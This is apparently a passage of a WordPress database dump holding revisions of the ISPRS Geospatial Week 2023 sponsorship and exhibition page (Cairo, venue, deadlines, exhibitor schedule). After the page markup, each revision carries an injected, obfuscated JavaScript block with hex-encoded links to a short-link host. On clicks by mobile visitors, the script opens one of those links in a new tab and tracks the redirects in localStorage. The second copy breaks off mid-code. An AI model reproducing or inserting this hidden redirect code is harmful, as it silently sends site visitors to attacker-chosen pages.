href=\"https://gsw2023.com/index.html\">info@gsw2023.com</a> ).</span>[/vc_column_text][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SPONSORSHIP AND EXHIBITION','','inherit','closed','closed','','2920-revision-v1','','','2023-03-23 03:43:42','2023-03-23 03:43:42','',2920,'https://gsw2023.com/?p=3938',0,'revision','',0),
(3939,1,'2023-03-23 03:45:39','2023-03-23 03:45:39','[vc_row][vc_column][vc_column_text]\r\n<h1 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">ISPRS GEOSPATIAL WEEK 2023</span></h1>\r\n<h2 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">SPONSORSHIP AND EXHIBITION ,</span><span style=\"font-size: 18pt;\">Cairo – Egypt 2-7 September 2023</span></h2>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]<span style=\"font-size: 10pt;\">The Arab Academy for Science, Science, and Maritime Transport as the ISPRS GSW2023 organizer would like to invite you to participate as a sponsor / exhibitor at the Geospatial Week 2023, which will be held in Cairo, Egypt on 2-7 September 2023.</span>\r\n\r\n<span style=\"font-size: 10pt;\">The Geospatial Week is an internationally renowned scientific event held once every two years. The event is organized by the International Society of Photogrammetry and Remote Sensing (ISPRS) to bring together expertise in the fields of photogrammetry, remote sensing, and geospatial information science. Some 1000 to 2000 researchers and professionals from around the world gathered for an entire week to share new findings and experiences through a series of dedicated workshops. More information regarding ISPRS can be found at: http://www.isprs.org/.</span>\r\n\r\n<span style=\"font-size: 10pt;\">An exhibition will also be held during the conference. This provides companies in the field with the opportunity to be involved and showcase their products, services, and expertise to an international audience. As a professional, you also get the chance to attend the presentations and follow the latest scientific developments in the field. Conference attendees are free to wander around the exhibition area during the workshops, coffee and lunch breaks. Participants can register for any number of days.</span>\r\n\r\n<span style=\"font-size: 10pt;\">A number of sponsorship and exhibition packages are available. Tailor-made options are also available, interested companies to contact the GSW Director Prof. Naser El-Sheimy at <a href=\"mailto:elsheimy@ucalgary.ca\">elsheimy@ucalgary.ca</a> or Prof. Amr Hanafi at <a href=\"mailto:amrhali@feng.bu.edu.eg\">amrhali@feng.bu.edu.eg</a> or Prof Alaa Abd El Bary <a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a> for more details on the sponsorship opportunities for the GSW/2023.</span>\r\n\r\n<span style=\"font-size: 10pt;\">We hope you will consider the opportunity to participate at the ISPRS Geospatial Week 2023 and look forward to meeting you in Cairo!</span>\r\n\r\n<span style=\"font-size: 10pt;\">The GSW2023 Organizing Committee.</span>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"chino\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\r\n<h5><span style=\"font-size: 12pt;\"><strong>SPONSORSHIP AND EXHIBITION PACKAGES</strong></span></h5>\r\n<span style=\"font-size: 10pt;\">Sponsorship options include the opportunity to give oral presentations about your company’s products, exhibition booths, live demonstrations and the ability to give a half-day interactive tutorial of your software or product on Sunday. More information regarding the various packages and additional à la carte options is given below. If you would like to discuss other sponsorship options or tailor-made packages, please contact the GSW Director Prof. Naser El-Sheimy at <a href=\"mailto:elsheimy@ucalgary.ca\">elsheimy@ucalgary.ca</a> or Prof. Amr Hanafi at <a href=\"mailto:amrhali@feng.bu.edu.eg\">amrhali@feng.bu.edu.eg</a> or Prof Alaa Abd El Bary <a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a> or <a href=\"https://gsw2023.com/index.html\">info@gsw2023.com</a> .</span>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"3933\" img_size=\"1800x2200\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner][vc_column_text]\r\n<h5><span style=\"font-size: 12pt;\"><strong>Venue - INTERCONTINENTAL  CAIRO SEMIRAMIS</strong></span></h5>\r\n<span style=\"font-size: 10pt;\">(<a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_undefined\">https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_undefined</a>)</span>\r\n\r\n<span style=\"font-size: 10pt;\">The GSW2023 will take place on the historic Semiramis hotel site, guests can enjoy modern luxury on the River Nile. This Cairo hotel features a rooftop pool, fine dining with exquisite cuisine for every taste, conference facilities, a state-of-the-art Spa, a shopping arcade, with the Nile Terrace offering stunning views of the sunset over the Nile. Located at a premium location in the heart of the city center, the hotel offers complimentary WIFI and is located next to the Egyptian Museum and bazaars of old Cairo.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"3936\" img_size=\"1000x1000\" alignment=\"center\" onclick=\"zoom\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\r\n<h5>SPONSORSHIP TIMETABLE AND DEADLINES</h5>\r\n<span style=\"font-size: 10pt;\">Upon registration, the sponsor’s logo and level of support will be published on the GSW2023 website.</span>\r\n<ul>\r\n 	<li><span style=\"font-size: 10pt;\">May 1, 2023 Deadline for sponsorship confirmation and payment</span></li>\r\n 	<li><span style=\"font-size: 10pt;\">June 1, 2013 Delivery of sponsorship material to be included in conference bags to:</span></li>\r\n</ul>\r\n<span style=\"font-size: 10pt;\"><strong> </strong></span><span style=\"font-size: 10pt;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></span>\r\n\r\n<span style=\"font-size: 10pt;\"><strong>Heliopolis Campus</strong></span>\r\n\r\n<span style=\"font-size: 10pt;\"><strong>Re: ISPRS GSW’2023</strong></span>\r\n\r\n<span style=\"font-size: 10pt;\"><strong>ATT: Prof. Alla Abdelbary</strong></span>\r\n\r\n<span style=\"font-size: 10pt;\">P.O. Box 2033 -Elhorria El Moshir Ismail st.-behind Sheraton Bldg. </span>\r\n\r\n<span style=\"font-size: 10pt;\">(+202) 22685616 - 22685615 </span>\r\n\r\n<span style=\"font-size: 10pt;\">(+202) 22685892</span>\r\n\r\n&nbsp;\r\n<h1><span style=\"font-size: 12pt;\">CONFERENCE PROGRAM FOR EXHIBITORS</span></h1>\r\n&nbsp;\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"170\"><span style=\"font-size: 10pt;\"><strong>September 2</strong></span></td>\r\n<td width=\"189\"><span style=\"font-size: 10pt;\"><strong>9:00 – 5:00</strong></span>\r\n\r\n<span style=\"font-size: 10pt;\"><strong> </strong></span></td>\r\n<td width=\"217\"><span style=\"font-size: 10pt;\"><strong>Tutorial Day</strong></span>\r\n\r\n<span style=\"font-size: 10pt;\"><strong>Exhibition Setup</strong></span></td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"><span style=\"font-size: 10pt;\"><strong>September 3</strong></span></td>\r\n<td width=\"189\"><span style=\"font-size: 10pt;\">12:00-17:00</span>\r\n\r\n<span style=\"font-size: 10pt;\">18:00 – 20:00</span></td>\r\n<td width=\"217\"><span style=\"font-size: 10pt;\">Exhibition Opening</span>\r\n\r\n<span style=\"font-size: 10pt;\">Welcome Reception</span></td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"><span style=\"font-size: 10pt;\"><strong>September 4</strong></span></td>\r\n<td width=\"189\"><span style=\"font-size: 10pt;\">9:00 – 17:00</span>\r\n\r\n<span style=\"font-size: 10pt;\">18:00 – 20:00</span></td>\r\n<td width=\"217\"><span style=\"font-size: 10pt;\">Exhibition</span>\r\n\r\n<span style=\"font-size: 10pt;\">Exhibitors’ reception</span></td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\"><span style=\"font-size: 10pt;\"><strong>September 5</strong></span></td>\r\n<td width=\"189\"><span style=\"font-size: 10pt;\">9:00 – 15:00</span>\r\n\r\n<span style=\"font-size: 10pt;\">15:00 – 18:00</span></td>\r\n<td width=\"217\"><span style=\"font-size: 10pt;\">Exhibition</span>\r\n\r\n<span style=\"font-size: 10pt;\">Dismantle Exhibition</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"font-size: 10pt;\">The Organizing Committee reserves the right to change these times to better fit the final program if necessary. Allocation of the booths will be on a first-come-first-served basis upon receiving the confirmation and payment, with preference given to the companies who request multiple booths</span>\r\n\r\n&nbsp;\r\n<h1><span style=\"font-size: 12pt;\">INFORMATION</span></h1>\r\n<span style=\"font-size: 10pt;\">For more information visit the Geospatial Week 2023 website: www.gsw2023.com or contact the organizing committee by mail (<a href=\"mailto:elsheimy@ucalgary.ca\">elsheimy@ucalgary.ca</a> or <a href=\"https://gsw2023.com/index.html\">info@gsw2023.com</a> ).</span>[/vc_column_text][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return 